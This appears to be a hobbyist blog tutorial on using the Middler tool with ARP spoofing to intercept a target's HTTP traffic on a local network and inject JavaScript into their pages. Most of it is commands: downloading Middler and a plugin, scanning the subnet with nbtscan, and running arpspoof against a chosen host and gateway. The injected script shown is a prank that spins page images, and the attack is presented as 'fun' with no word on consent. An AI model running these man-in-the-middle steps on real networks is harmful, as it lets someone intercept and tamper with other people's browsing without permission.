ARP Spoof fun with Middler

While surfing around found a nice tool to play fun with a tool called Middler using ARP Spoof (MITM).

Middler is a tool which can inject a Javascript code (js) into target’s HTTP session. In this tutorial I’m going to explain how to perform this attack. If you don’t know how ARP Spoof works check my previous article here. In this case I’m using BackTrack 5. Whole credits on this tutorial goes to creator of this tool and tutorial by SB91@hackforums.net

Copy the following code into the address bar on your web browser to see what will happen after injection.

[box]javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; var _X = 500; var _Y = 500; var DI= document.images; DIL=DI.length; function A(){for(i=0; i<DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+_X+"px"; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+_Y+"px";}R++}tag=setInterval('A()',5 );document.onmousemove=function(event){_X = event.clientX; _Y = event.clientY;}; void(0)[/box]

You need to download these two files first.

[box]http://dl.dropbox.com/u/35937264/Middler/middler.tar.gz[/box]

[box]http://dl.dropbox.com/u/35937264/Middler/funny_js.py[/box]

After downloading go to download folder and enter following command.

[box]#tar -xzvf middler.tar.gz (extract middler)[/box]

[box]#cp funny_js.py middler/libmiddler/plugins/http/ (copy the plugin to the directory)[/box]

You need to stop apache2 before starting midder. Because it runs on port 80.

[box]#/etc/init.d/apache2 stop[/box]

Now move to the middler folder and run middler.py

[box]#cd middler/[/box]

[box]#python middler.py[/box]

Middler is now started. It’s time to inject it to a target. Do a network scan to find a target.

[box]#nbtscan 192.168.1.0/24[/box]

Where 192.168.1.0 is your subnet

ARP Spoof the target

[box]#arpspoof -i eth0 -t 192.168.1.10 192.168.1.1[/box]

Where -i the interface, -t target and gateway

Now walk to the target machine and hit www.geeklk.com.

Have fun :p